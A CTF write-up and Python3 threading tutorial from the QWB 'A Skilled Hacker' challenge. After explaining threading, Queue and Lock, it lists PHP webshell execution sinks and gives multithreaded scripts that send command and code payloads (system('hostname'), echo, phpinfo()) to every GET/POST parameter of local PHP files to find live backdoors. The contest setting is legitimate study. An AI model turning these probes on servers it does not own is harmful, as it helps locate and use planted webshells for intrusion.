A Python3 multithreading example: a tool for batch-testing live webshells

Prologue

In last weekend's QWB CTF (强网杯) there was a challenge called "高明的黑客" ("A Skilled Hacker"). The core task was to find the live webshells among 3000+ PHP files, each with dozens of GET/POST injection points. On the first night I let a naive script run until morning; I was too inexperienced and had overlooked a lot. After the contest ended, a multithreaded version finished very quickly. So this post records the lesson: when a script is going to cost a lot of time, optimize it up front instead of noticing mid-run that it is too slow, patching it a little, and repeating the cycle until it is far too late. Hesitation leads to defeat, indeed.

1. Python3 multithreading

1.1. Python3 ships two thread-related modules:

  • _thread
  • threading

1.2. The old "thread" module has been deprecated; use threading instead. In Python 3 you can no longer import "thread" — for backward compatibility it was renamed "_thread". It is simple to use:

```python
_thread.start_new_thread(function, args[, kwargs])
```

An example:

```python
import _thread
import time

# Function run by each thread
def print_time(threadName, delay):
    count = 0
    while count < 5:
        time.sleep(delay)
        count += 1
        print("%s: %s" % (threadName, time.ctime(time.time())))

# Create two threads
try:
    _thread.start_new_thread(print_time, ("Thread-1", 2,))
    _thread.start_new_thread(print_time, ("Thread-2", 4,))
except:
    print("Error: unable to start thread")

# _thread has no join(), so busy-wait to keep the main thread alive
while 1:
    pass
```

1.3. _thread provides low-level, primitive threads and one simple lock; compared with the threading module its functionality is quite limited.
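The "simple lock" mentioned above is the one returned by _thread.allocate_lock(). A minimal sketch of using it to protect a shared counter (the counter and iteration count are illustrative):

```python
import _thread
import time

counter = 0
lock = _thread.allocate_lock()  # the single lock primitive _thread offers

def worker():
    global counter
    for _ in range(100000):
        with lock:  # lock objects support the context-manager protocol
            counter += 1

# Run two workers; without the lock the final count would be unpredictable
_thread.start_new_thread(worker, ())
_thread.start_new_thread(worker, ())
time.sleep(2)  # crude wait: _thread has no join()
print(counter)
```

Note the crude `time.sleep` at the end — the lack of a join() is exactly the kind of limitation that makes threading preferable.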

Besides covering everything _thread does, the threading module provides these functions:
  • threading.current_thread(): returns the current Thread object.
  • threading.enumerate(): returns a list of all currently running threads.
  • threading.active_count(): returns the number of running threads; equal to len(threading.enumerate()).
The module also provides the Thread class, whose main methods are:
  • run(): the method representing the thread's activity.
  • start(): starts the thread.
  • join([timeout]): waits for the thread to terminate. This blocks the calling thread until the joined thread finishes — normally or via an unhandled exception — or until the optional timeout elapses.
  • is_alive(): returns whether the thread is still running.
  • getName() / setName(): get / set the thread name (deprecated aliases of the name attribute).
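A quick demonstration of start/join/is_alive and the thread name (the thread's work is a placeholder sleep):

```python
import threading
import time

def work():
    time.sleep(0.2)  # stand-in for real work

t = threading.Thread(target=work, name="worker-1")
alive_before = t.is_alive()   # False: not started yet
t.start()
alive_running = t.is_alive()  # True: work() is still sleeping
t.join()                      # block until work() returns
alive_after = t.is_alive()    # False again once the thread has finished
print(alive_before, alive_running, alive_after, t.name)
```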

1.4. The most basic way to use multithreading

```python
import threading

def thread_job():
    print('This is thread_job, thread is %s' % threading.current_thread())

def main():
    added_thread = threading.Thread(target=thread_job)
    added_thread.start()
    print(threading.active_count())
    print(threading.enumerate())
    print(threading.current_thread())

if __name__ == '__main__':
    main()
```

1.5. Using join and a Queue

```python
import threading
from queue import Queue

def job(l, q):
    for i in range(len(l)):
        l[i] = l[i] ** 2
    q.put(l)

def multithreading():
    q = Queue()
    threads = []
    data = [[1, 2, 3], [3, 4, 5], [4, 4, 4], [5, 5, 5]]
    for i in range(4):
        t = threading.Thread(target=job, args=(data[i], q))
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join()
    results = []
    for _ in range(4):
        results.append(q.get())
    print(results)

if __name__ == '__main__':
    multithreading()
```

Output:

```
[[1, 4, 9], [9, 16, 25], [16, 16, 16], [25, 25, 25]]
```
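The Queue is needed because a Thread's target function cannot return a value to the caller; join() only waits, it does not collect results. A stripped-down illustration of the pattern:

```python
import threading
from queue import Queue

def square(n, q):
    q.put(n * n)  # "return" the result through the thread-safe queue

q = Queue()
threads = [threading.Thread(target=square, args=(n, q)) for n in (2, 3, 4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
# Completion order is not guaranteed, so sort before comparing
results = sorted(q.get() for _ in threads)
print(results)  # [4, 9, 16]
```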

1.6. Thread synchronization

If several threads modify the same data concurrently, the result can be unpredictable. To keep shared data correct, the threads must be synchronized.

Simple synchronization can be achieved with the threading module's Lock and RLock objects. Both provide acquire and release methods; any operation that must only be performed by one thread at a time goes between the acquire and release calls, like this:

```python
import threading
import time

class myThread(threading.Thread):
    def __init__(self, threadID, name, counter):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.counter = counter

    def run(self):
        print("Starting thread: " + self.name)
        # Acquire the lock to synchronize the threads
        threadLock.acquire()
        print_time(self.name, self.counter, 3)
        # Release the lock so the next thread can run
        threadLock.release()

def print_time(threadName, delay, counter):
    while counter:
        time.sleep(delay)
        print("%s: %s" % (threadName, time.ctime(time.time())))
        counter -= 1

threadLock = threading.Lock()
threads = []

# Create new threads
thread1 = myThread(1, "Thread-1", 1)
thread2 = myThread(2, "Thread-2", 2)

# Start the threads
thread1.start()
thread2.start()

# Add the threads to the thread list
threads.append(thread1)
threads.append(thread2)

# Wait for all threads to finish
for t in threads:
    t.join()
print("Exiting main thread")
```
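As a side note, Lock and RLock also support the context-manager protocol, so the acquire/release pair in run() can be written more safely as a with block — the lock is released even if the critical section raises. A minimal sketch:

```python
import threading

lock = threading.Lock()
shared = []

def critical(item):
    with lock:  # equivalent to acquire() ... release() wrapped in try/finally
        shared.append(item)

threads = [threading.Thread(target=critical, args=(i,)) for i in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(sorted(shared))  # [0, 1, 2, 3, 4]
```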

2. PHP webshell background

A webshell is a command-execution environment in the form of a web page file — asp, php, jsp, cgi, and so on — and can be thought of as a web backdoor.
Commonly used execution functions:

```php
system('command');
eval('php code');
assert('php code');
```

Some other less obvious functions can also yield a PHP webshell.
The str_replace character-replacement function:

```php
<?php
$s = str_replace('p', '', 'pspypsptpepmp');
echo $s;
# prints: system
```

create_function(), which builds an anonymous function:

```php
<?php
# create_function('parameter list', 'PHP code string');
$info = create_function('', 'phpinfo();');
$info();?>
```

Summary:

  • System command execution: system, passthru, shell_exec, exec, popen, proc_open
  • Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
  • File inclusion / file manipulation: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
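A static pre-filter along these lines can be sketched in a few lines of Python — scanning source text for the sink names above (the sample source string is illustrative only):

```python
import re

# A subset of the dangerous PHP sinks listed above
SINKS = r"\b(system|passthru|shell_exec|exec|popen|proc_open|eval|assert)\s*\("

def suspicious(php_source):
    """Return the sink names referenced in a piece of PHP source."""
    return sorted(set(m.group(1) for m in re.finditer(SINKS, php_source)))

sample = "<?php eval($_GET['a']); system($_POST['b']); ?>"
print(suspicious(sample))  # ['eval', 'system']
```

This is roughly what simple scanners do — which is why, on this challenge, matching alone flags every file and a liveness check is still required.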

3. Brute-force testing which webshells are live

Back to the challenge. At first I had no idea there were this many GET/POST points, so I ran tools like D盾 (D Shield) over the files — and every single file got flagged. I suspect those tools simply pattern-match the sensitive functions and the GET/POST points. To confirm which shells actually work, we need to host the files locally and probe every parameter, looking for a reliable marker in the response. On my Windows test box, a PHP-code sink can be verified with phpinfo() or with system('hostname'); since phpinfo()'s output is huge, I prefer the latter. A command sink is verified with the bare hostname command, which returns the machine name; the reverse does not work, because hostname is not valid PHP code. (On a Linux server the analogous pair is system('id'); for code sinks and id for command sinks.)

So the first version of the script looked like this (only GET parameters handled for now):

```python
import os
import re
import requests

answer = open('answer.txt', 'w')
filePath = './src/'
files = os.listdir(filePath)
url = "http://localhost/src/"
file_count = 0

def get_rep(filename, name):
    # Probe for a command sink: system($_GET[name]) runs "hostname"
    # ('DESKTOP-CE0L9E5' is this test machine's hostname)
    r_url = url + filename + "?" + name + "=hostname"
    rep = requests.get(r_url)
    if 'DESKTOP-CE0L9E5' in rep.content.decode('utf-8'):
        answer.write("Got It! !!!!!!! " + filename + " The param is: _GET['" + name + "']\n")
        print("Got It! !!!!!!! " + filename + " The param is: _GET['" + name + "']")

    # Probe for a code sink: eval($_GET[name]) runs system('hostname');
    r_url = url + filename + "?" + name + "=system('hostname');"
    rep = requests.get(r_url)
    if 'DESKTOP-CE0L9E5' in rep.content.decode('utf-8'):
        answer.write("Got It! !!!!!!! " + filename + " The param is: _GET['" + name + "']\n")
        print("Got It! !!!!!!! " + filename + " The param is: _GET['" + name + "']")

for k in files:
    if k in ('.DS_Store', 'index.html'):
        continue
    print(k)
    with open(filePath + k, 'rt') as f:
        file_count += 1
        print('Progress: {:.2%}'.format(file_count / len(files)))
        content = f.read()
    get = re.findall(r"GET\['(.+?)'\]", content)
    # post = re.findall(r"POST\['(.+?)'\]", content)
    for i in get:
        print('FileName:' + k + ' ParamName:' + i)
        get_rep(k, i)
answer.close()
```

Then I looked for optimizations. If a single payload could test both the PHP-code sinks and the command sinks, the number of HTTP requests would be cut in half. Such a payload exists: echo 'Hello Kitty';. Whether it is evaluated as PHP code or passed to a shell via system, executing it leaves "Hello Kitty" in the response.

So the GET probe becomes:

```python
def get_rep(filename, name):
    r_url = url + filename + "?" + name + "=echo 'Hello Kitty';"
    # print(r_url)
    rep = requests.get(r_url)
    if 'Hello Kitty' in rep.content.decode('gbk'):
        Record_To_File(filename, name)
```

4. Multithreaded live-webshell detection

Now we just combine the brute-force script with the multithreading techniques above:

```python
import threading
import time
import os
import re
import requests

file_count = 0
url = "http://127.0.0.1/src/"
filePath = './src/'
files = os.listdir(filePath)
nameList = []     # list of candidate file names
nameSepList = []  # file names split into per-thread chunks
threadLock = threading.Lock()

def storefile():
    # Collect file names, skipping the ones we don't care about
    for k in files:
        if k == '.DS_Store':
            continue
        if k == 'index.html':
            continue
        nameList.append(k)
        # print(k)

# Split the file names into threadCount roughly equal chunks, one per thread
def separateName(threadCount):
    chunk = -(-len(nameList) // threadCount)  # ceiling division
    for i in range(0, len(nameList), chunk):
        nameSepList.append(nameList[i:i + chunk])

# Spawn the worker threads
def multithreading(threadCount):
    separateName(threadCount)  # split the work first
    for part in nameSepList:
        t = threading.Thread(target=run_one_thread, args=(part,))
        t.start()

# Work done by each thread; the argument is a list of file names
def run_one_thread(name_list):
    for k in name_list:
        print(k)
        with open(filePath + k, 'rt') as f:
            # threadLock.acquire()
            global file_count
            file_count += 1
            # threadLock.release()
            # print('Progress: {:.2%}'.format(file_count / len(files)))
            content = f.read()
        get = re.findall(r"GET\['(.+?)'\]", content)
        # post = re.findall(r"POST\['(.+?)'\]", content)
        for i in get:
            get_rep(k, i)

# Send the GET probe
def get_rep(filename, name):
    r_url = url + filename + "?" + name + "=echo 'Hello Kitty';"
    # print(r_url)
    rep = requests.get(r_url)
    if 'Hello Kitty' in rep.content.decode('gbk'):
        Record_To_File(filename, name)

def Record_To_File(filename, name):
    answer = open('answer.txt', 'a+')
    end = time.time()
    answer.write("Got It! !!!!!!! " + filename + " The param is: _GET['" + name + "']"
                 + " Need time :" + str(end - start) + "s\n")
    print("Got It! !!!!!!! " + filename + " The param is: _GET['" + name + "']")
    answer.close()

if __name__ == '__main__':
    start = time.time()
    storefile()
    multithreading(20)
```

(Note: the original version stepped through nameList with a stride of threadCount, which yields chunks of size threadCount rather than threadCount chunks — with 20 threads and 3000 files, only the first 400 files would ever be scanned. separateName above uses ceiling division to fix that.)
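Hand-rolled chunking like separateName() is easy to get wrong. Since Python 3.2 the standard library offers concurrent.futures, which distributes work across a pool for you. A hedged sketch of the same scan loop on a thread pool — check_file is a stand-in for the real per-file logic (read the file, extract parameters, fire the HTTP probes):

```python
from concurrent.futures import ThreadPoolExecutor

def check_file(name):
    # Placeholder for the real per-file work; here it just transforms the name
    return name.upper()

files = ['a.php', 'b.php', 'c.php']
with ThreadPoolExecutor(max_workers=20) as pool:
    # map() distributes files across the pool; results come back in input order
    results = list(pool.map(check_file, files))
print(results)  # ['A.PHP', 'B.PHP', 'C.PHP']
```

The with block also joins all workers on exit, so there is no need to track threads by hand.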

One more revision: the threading is pared back here, but this version adds recursive file discovery under the web root and a second probe (phpinfo();) to catch assert-style sinks:

```python
import os
import re
import requests

url = "http://127.0.0.1"
base_dir = 'E:/CodingSoftware/PhpStudy/PHPTutorial/WWW'
url_list = []  # URL of every PHP file under base_dir

print("base_url: " + url)
print("base_dir: " + base_dir)

def get_url_list():
    # Walk base_dir recursively and map every .php file to its URL
    length = len(base_dir)
    for parent, dirnames, filenames in os.walk(base_dir, followlinks=True):
        for filename in filenames:
            file_path = os.path.join(parent, filename)
            rel_path = file_path[length:].replace('\\', '/')
            if rel_path.endswith('.php') and 'phpMyAdmin' not in rel_path:
                url_list.append(url + rel_path)
                # print(url + rel_path)

# Process a list of URLs: extract parameter names from the source, probe each one
def run(name_list):
    for k in name_list:
        obj_path = k[len(url):]
        file_path = base_dir + obj_path
        with open(file_path, 'rt', errors='ignore') as f:
            content = f.read()
        # Match $_GET['x'], $_GET["x"] and the unquoted $_GET[x] (same for POST)
        get_params = (re.findall(r"GET\['([A-Za-z_-]+?)'\]", content)
                      + re.findall(r"GET\[\"([A-Za-z_-]+?)\"\]", content)
                      + re.findall(r"GET\[([A-Za-z_-]+?)\]", content))
        post_params = (re.findall(r"POST\['([A-Za-z_-]+?)'\]", content)
                       + re.findall(r"POST\[\"([A-Za-z_-]+?)\"\]", content)
                       + re.findall(r"POST\[([A-Za-z_-]+?)\]", content))
        for i in get_params:
            get_rep(k, i)
            print(obj_path + " Key is: " + i)
        for i in post_params:
            post_rep(k, i)
            print(obj_path + " Key is: " + i)

# Send the GET probes
def get_rep(base_url, name):
    r_url = base_url + "?" + name + "=echo 'Hello Kitty';"
    # print(r_url)
    rep = requests.get(r_url)
    if 'Hello Kitty' in rep.content.decode('gbk'):
        Record_To_File(r_url, name)

    r_url = base_url + "?" + name + "=phpinfo();"  # covers assert() sinks
    # print(r_url)
    rep = requests.get(r_url)
    if 'PHP Version' in rep.content.decode('gbk'):
        Record_To_File(r_url, name)

# Send the POST probes
def post_rep(base_url, name):
    param = {name: "echo 'HelloKitty';"}
    rep = requests.post(base_url, data=param)
    # print(base_url + " POST: " + name)
    if 'HelloKitty' in rep.content.decode('gbk'):
        Record_To_File(base_url, name)

    param = {name: "phpinfo();"}  # covers assert() sinks
    rep = requests.post(base_url, data=param)
    # print(base_url + " POST: " + name)
    if 'PHP Version' in rep.content.decode('gbk'):
        Record_To_File(base_url, name)

def Record_To_File(filename, name):
    answer = open('answer.txt', 'a+')
    answer.write("Got It! !!!!!!! " + filename + " The param is: ['" + name + "']\n")
    print("Got It! !!!!!!! " + filename + " The param is: ['" + name + "']")
    answer.close()

if __name__ == '__main__':
    get_url_list()
    run(url_list)
```